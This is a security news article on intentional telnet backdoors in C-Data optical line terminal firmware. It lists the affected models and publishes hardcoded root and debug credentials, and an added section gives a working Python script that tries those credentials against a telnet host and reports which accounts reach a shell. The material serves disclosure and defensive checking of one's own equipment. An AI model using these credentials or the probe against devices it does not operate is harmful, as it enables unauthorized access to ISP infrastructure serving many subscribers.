Chinese Vendor of OLT Devices Loads them with Firmware Backdoors

Last updated July 10, 2020
Written by: Bill Toulas, Infosec Writer

C-Data, a Chinese manufacturer of network equipment, has been caught by security researchers Pierre Kim and Alexandre Torres, who found intentionally planted backdoors in the firmware of its OLT (optical line terminal) devices. An OLT sits at the service-provider end of a passive optical network (PON): it terminates the fibre lines that fan out to the optical network units in buildings, offices and homes, and hands their traffic to the ISP's Ethernet/IP network, so a compromised OLT sits upstream of every subscriber connected to it. C-Data sells these OLTs under its own brand and also under the "OptiLink", "V-SOL CN" and "BLIY" names.

[Image: gpon-olt-1608sn-solution-01. Source: C-Data]

The researchers tested the C-Data models FD1104B and FD1108SN in the lab and found that firmware versions V1.2.2, 2.4.05_000, 2.4.04_001 and 2.4.03_000 contain the backdoors. From further analysis of the firmware, they concluded that the following models are affected by this critical security problem:

List of Affected Models: 72408A, 9008A, 9016A, 92408A, 92416A, 9288, 97016, 97024P, 97028P, 97042P, 97084P, 97168P, FD1002S, FD1104, FD1104B, FD1104S, FD1104SN, FD1108S, FD1204S-R2, FD1204SN, FD1204SN-R2, FD1208S-R2, FD1216S-R1, FD1608GS, FD1608SN, FD1616GS, FD1616SN, FD8000

[Image: c-data olt. Source: C-Data]

The researchers are in no doubt that the backdoor was planted intentionally. The OLT firmware runs a telnet server that accepts hardcoded accounts such as "debug" with the password "debug124" and "root" with the password "root126", so anyone who knows these credentials, which are now public, can log into the device remotely without having to guess anything.

[Image: authentication. Source: pierrekim.github.io]
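A network engineer who wants to know whether an OLT on their network accepts the accounts quoted above can test for them directly. The probe below is an added example written for this article; it is not the researchers' tooling and not code from C-Data. It speaks just enough telnet to refuse every option the device offers, walks the login and password prompts, and treats a trailing shell prompt character as a successful login. Only the two credential pairs named above are included, and the prompt patterns, the success heuristic and the FakeOLT stand-in used for the offline demonstration are assumptions rather than captured device behaviour. Run it only against equipment you are responsible for.

```python
"""Probe a telnet service for the hardcoded OLT accounts quoted in the article (added example, not vendor or researcher code)."""
import re
import socket
import sys

IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240
BACKDOOR_ACCOUNTS = (("debug", "debug124"), ("root", "root126"))   # the pairs the article quotes; extend from the advisory
# Prompt patterns are assumptions about typical CLI output, not strings captured from a device.
LOGIN_PROMPT = re.compile(rb"(login|username)\s*:\s*$", re.I)
PASSWORD_PROMPT = re.compile(rb"password\s*:\s*$", re.I)
FAILURE = re.compile(rb"incorrect|failed|denied|invalid", re.I)
OUTCOME = re.compile(rb"[#$>]\s*$|(?i:incorrect|failed|denied|invalid)|(?i:login|username)\s*:\s*$")

def strip_telnet_options(data):
    """Return (text with IAC sequences removed, refusal replies to send back to the peer)."""
    out, reply, i = bytearray(), bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            out.append(data[i]); i += 1; continue
        if i + 1 >= len(data):                          # command cut off at the end of this chunk
            break
        cmd = data[i + 1]
        if cmd == IAC:                                   # escaped 0xFF data byte
            out.append(IAC); i += 2
        elif cmd == SB:                                  # skip a subnegotiation up to IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        elif cmd in (DO, WILL) and i + 2 < len(data):   # refuse what it asks for, decline what it offers
            reply += bytes([IAC, WONT if cmd == DO else DONT, data[i + 2]])
            i += 3
        else:                                            # DONT/WONT, NOP, GA, ... or a truncated DO/WILL
            i += 3 if cmd in (DONT, WONT) else 2
    return bytes(out), bytes(reply)

def read_until(conn, pattern, timeout=5.0, limit=4096):
    """Accumulate text from conn until pattern matches, the peer closes, or a read times out."""
    conn.settimeout(timeout)
    buf = b""
    while len(buf) < limit and not pattern.search(buf):
        try:
            chunk = conn.recv(1024)
        except socket.timeout:
            break
        if not chunk:                                    # peer closed the connection
            break
        text, reply = strip_telnet_options(chunk)
        if reply:
            conn.sendall(reply)
        buf += text
    return buf

def try_login(conn, user, password):
    """True if user/password reaches a shell prompt on an already-open telnet connection."""
    for prompt, answer in ((LOGIN_PROMPT, user), (PASSWORD_PROMPT, password)):
        if not prompt.search(read_until(conn, prompt)):
            return False
        conn.sendall(answer.encode() + b"\r\n")
    result = read_until(conn, OUTCOME)
    return result.rstrip()[-1:] in (b"#", b"$", b">") and not FAILURE.search(result)

def probe(host, port=23, accounts=BACKDOOR_ACCOUNTS, connect=None):
    """Try each account on a fresh connection (servers often drop after a failure); return those that log in."""
    connect = connect or (lambda: socket.create_connection((host, port), timeout=5))
    hits = []
    for user, password in accounts:
        conn = connect()
        try:
            if try_login(conn, user, password):
                hits.append((user, password))
        finally:
            conn.close()
    return hits

class FakeOLT:
    """Constructed in-memory stand-in for a device's telnet service (offline demo only, not a capture)."""
    def __init__(self, valid_accounts):
        self.valid, self.user, self.stage = set(valid_accounts), None, "login"
        self.outbox = bytes([IAC, WILL, 1]) + b"\r\nWelcome\r\nLogin: "   # offers option 1 (ECHO) first
    def settimeout(self, timeout): pass
    def close(self): pass
    def recv(self, n):
        if not self.outbox:
            raise socket.timeout()
        chunk, self.outbox = self.outbox[:n], self.outbox[n:]
        return chunk
    def sendall(self, data):
        if data[:1] == bytes([IAC]):                     # the probe's option refusal; nothing to do
            return
        line = data.rstrip(b"\r\n").decode()
        if self.stage == "login":
            self.user, self.stage, self.outbox = line, "password", self.outbox + b"Password: "
        else:
            ok = (self.user, line) in self.valid
            self.outbox += b"\r\nOLT# " if ok else b"\r\nLogin incorrect\r\nLogin: "

if __name__ == "__main__":   # usage: python probe.py <host> [port], only against equipment you operate
    print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 23))
```

An empty list means none of the listed accounts reached a shell prompt; it does not mean the device is clean, because the advisory lists more accounts than the two quoted here and the prompt heuristics will not match every firmware build. Every attempt uses a fresh connection because telnet daemons commonly close the session after a failed login, which would otherwise make the second account appear to fail.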

Once an attacker has a telnet session on the device, several things follow. As the researcher explains, it takes only simple commands to extract the administrator credentials stored on the OLT, to escape the restricted shell into a root shell, and to crash the device with a pre-authentication remote denial of service. Man-in-the-middle attacks and interception of passwords sent in clear text are also entirely possible, a grave scenario for the end-user.

Because they consider the backdoors intentional, the researchers deliberately skipped the usual process of contacting the vendor, waiting for a response and a patch, and going through retesting rounds; they published everything directly so that network engineers can take note and act. C-Data has not issued an official response, and it will be hard for its PR department to explain any of this. As for what end-users can do, the answer is not much beyond informing their ISP and asking its technicians to double-check which equipment they are using.
